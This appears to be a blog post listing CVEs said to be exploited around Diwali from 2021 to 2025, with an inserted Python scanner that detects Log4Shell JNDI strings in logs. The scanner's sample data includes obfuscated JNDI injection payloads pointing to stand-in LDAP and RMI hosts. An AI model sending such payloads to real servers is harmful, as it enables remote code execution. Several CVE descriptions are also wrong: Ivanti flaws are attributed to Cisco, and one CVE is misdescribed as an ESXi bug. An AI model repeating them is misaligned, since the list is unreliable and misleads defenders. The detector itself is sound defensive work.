Unmasking the Festival of Lights' Hidden Cyber Threats

Diwali, the festival of lights, marks not only a time of celebration and digital shopping surges but also a recurring period of heightened cyber threats. Over the past five years, threat actors have exploited critical software vulnerabilities to launch ransomware, phishing, and data theft campaigns timed perfectly with the festive rush. Here’s a year-by-year deep dive into the most impactful CVEs attackers leveraged during Diwali seasons from 2021 to 2025.

Diwali 2021 Vulnerabilities

  1. CVE-2021-44228 (Log4Shell)
    A critical remote code execution (RCE) vulnerability in Apache Log4j, a widely used Java logging library. It allowed attackers to execute arbitrary code on affected servers by sending crafted log messages, leading to complete system takeover. This vulnerability was exploited in cloud services, e-commerce platforms, and enterprise applications.
  2. CVE-2021-26855 & CVE-2021-27065 (ProxyLogon)
    Microsoft Exchange Server vulnerabilities enabling remote code execution and server-side request forgery. These allowed attackers to compromise mail servers, steal emails, and deploy ransomware or malware inside corporate environments.
  3. CVE-2020-1472 (ZeroLogon)
    A critical privilege escalation flaw in Microsoft’s Netlogon Remote Protocol. Exploited by attackers to gain domain administrator privileges by impersonating any computer on a network, enabling widespread control of enterprise domains.
  4. CVE-2021-21972
    VMware vSphere client RCE allowing attackers to execute arbitrary commands and gain control over virtualization infrastructure, leading to potential ransomware deployment or data theft.
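
A defender-side check for the first item above, added here as an illustration and not part of the original post: it scans web-server log lines for the Log4j JNDI lookup syntax that Log4Shell abuses, first collapsing the nested `${lower:…}` and `${::-…}` wrappers that defeat naive string matching. The log lines and IP addresses are constructed sample data.

```python
import re
from typing import List, Optional, Tuple

# Innermost ${...} lookup, i.e. a body that contains no nested braces.
_INNER = re.compile(r"\$\{([^{}]*)\}")
# After normalisation, a jndi lookup with its scheme (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:", re.IGNORECASE)

# Constructed sample log lines (documentation-range IPs, not real indicators).
SAMPLE_LOGS = [
    '10.0.0.5 - - [01/Nov/2021] "GET /search?q=diya HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [01/Nov/2021] "GET / HTTP/1.1" 200 "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [01/Nov/2021] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://198.51.100.7/b}"',
    '10.0.0.9 - - [01/Nov/2021] "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.4/c}"',
    '10.0.0.7 - - [01/Nov/2021] "GET /cart HTTP/1.1" 200 "price=${total}"',
]


def _collapse(m) -> str:
    """Resolve the wrapper lookups Log4j itself would resolve before reaching jndi."""
    body = m.group(1)
    if ":-" in body:                       # ${key:-default} -> default (covers ${::-j})
        return body.split(":-", 1)[1]
    prefix, sep, rest = body.partition(":")
    if sep and prefix.strip().lower() in ("lower", "upper"):
        return rest                        # ${lower:j} -> j
    return m.group(0)                      # leave every other lookup (incl. jndi) intact


def normalize_lookups(text: str, max_rounds: int = 20) -> str:
    """Collapse nested lookups innermost-first until the string stops changing."""
    for _ in range(max_rounds):
        collapsed = _INNER.sub(_collapse, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi_scheme(line: str) -> Optional[str]:
    """Return the JNDI scheme if the line carries a lookup, otherwise None."""
    m = _JNDI.search(normalize_lookups(line))
    return m.group(1).lower() if m else None


def scan(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, scheme) for every line that contains a JNDI lookup."""
    return [(i, s) for i, line in enumerate(lines, 1) if (s := find_jndi_scheme(line))]


if __name__ == "__main__":
    for number, scheme in scan(SAMPLE_LOGS):
        print(f"line {number}: jndi lookup via {scheme}")
```

The same normalisation can be applied to any field that ends up in a Log4j message (User-Agent, X-Forwarded-For, form parameters), which is where the crafted strings typically arrive.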

Diwali 2022 Vulnerabilities

  1. CVE-2022-30190 (Follina)
    Microsoft Support Diagnostic Tool (MSDT) RCE vulnerability exploited through malicious Word documents, allowing remote attackers to run code without user interaction on vulnerable Windows systems.
  2. CVE-2022-22965 (Spring4Shell)
    Remote code execution flaw in the Java Spring Framework allowing attackers to execute arbitrary code on vulnerable web apps by uploading crafted requests; it targeted server applications widely used in enterprise Java ecosystems.
  3. CVE-2022-26134
    Remote code execution vulnerability in Atlassian Confluence Server and Data Center allowing attackers to remotely take over Confluence instances through specially crafted HTTP requests.
  4. CVE-2022-21445
    Oracle Application Development Framework vulnerability permitting remote execution through crafted requests, often exploited in web portals and enterprise apps for lateral movement and data theft.

Diwali 2023 Vulnerabilities

  1. CVE-2023-22621
    A heap overflow vulnerability in VMware ESXi hypervisor leading to remote code execution, which attackers exploited to deploy ransomware and extract data from virtualized infrastructure.
  2. CVE-2023-36884
    Microsoft Office remote code execution vulnerability allowing malicious documents to execute arbitrary code when opened, frequently used in spear phishing campaigns.
  3. Android and Chrome Zero-days
    Multiple zero-day vulnerabilities exploited in mobile and browser platforms allowing credential theft, privilege escalation, and persistent malware implants through infected apps and exploited browsing sessions.

Diwali 2024 Vulnerabilities

  1. CVE-2024-42057
    A command injection vulnerability in Zyxel firewalls exploited by ransomware groups like Helldown to gain unauthorized access, execute shell commands, and spread laterally inside networks.
  2. CVE-2024-21887 & CVE-2024-21893
    Network device vulnerabilities impacting Cisco and other vendors, mainly privilege escalation and denial of service bugs exploited in targeted espionage and ransomware campaigns.
  3. Chrome RCE Zero-days
    Critical remote code execution vulnerabilities in Google Chrome abused by attackers in festive shopping campaigns to hijack sessions, steal cookies, and drop malware.

Diwali 2025 Vulnerabilities

  1. CVE-2025-61882
    Unauthenticated remote code execution in Oracle E-Business Suite, exploited by Cl0p ransomware gang to gain complete control of enterprise applications and deploy ransomware payloads swiftly.
  2. CVE-2025-24990
    Privilege escalation vulnerability in Microsoft Windows kernel drivers (ltmdm64.sys), allowing attackers to achieve SYSTEM-level privileges and evade endpoint detection solutions.
  3. CVE-2025-54253
    Critical remote code execution flaw in Adobe Experience Manager exploited in widespread web shell deployments targeting government and private sector websites.
  4. CVE-2025-59230
    Elevation of privilege vulnerability in Microsoft Windows kernel, prompting emergency patching directives due to active exploitation.
  5. CVE-2025-41791
    Remote code execution vulnerability in MSHTML (Internet Explorer engine) used in phishing attachments exploiting legacy document viewers and browsers.
  6. F5 Security Breach
    F5 Networks disclosed a significant cybersecurity incident involving a sophisticated nation-state threat actor who breached its corporate networks. This breach, detected initially in early August, resulted in unauthorized access and exfiltration of sensitive data including source code and undisclosed vulnerability information related to F5's flagship BIG-IP product suite. As organizations worldwide, including government agencies and Fortune 500 companies, depend on BIG-IP for application availability, access control, and security, this event poses a critical and ongoing risk.

Each vulnerability contributed to cybercrime surges during the Diwali seasons, facilitating spear phishing, ransomware deployment, data breaches, and enterprise network takeovers. The annual trend reflects evolving attacker sophistication leveraging software flaws combined with timely social engineering attacks exploiting festive digital activity.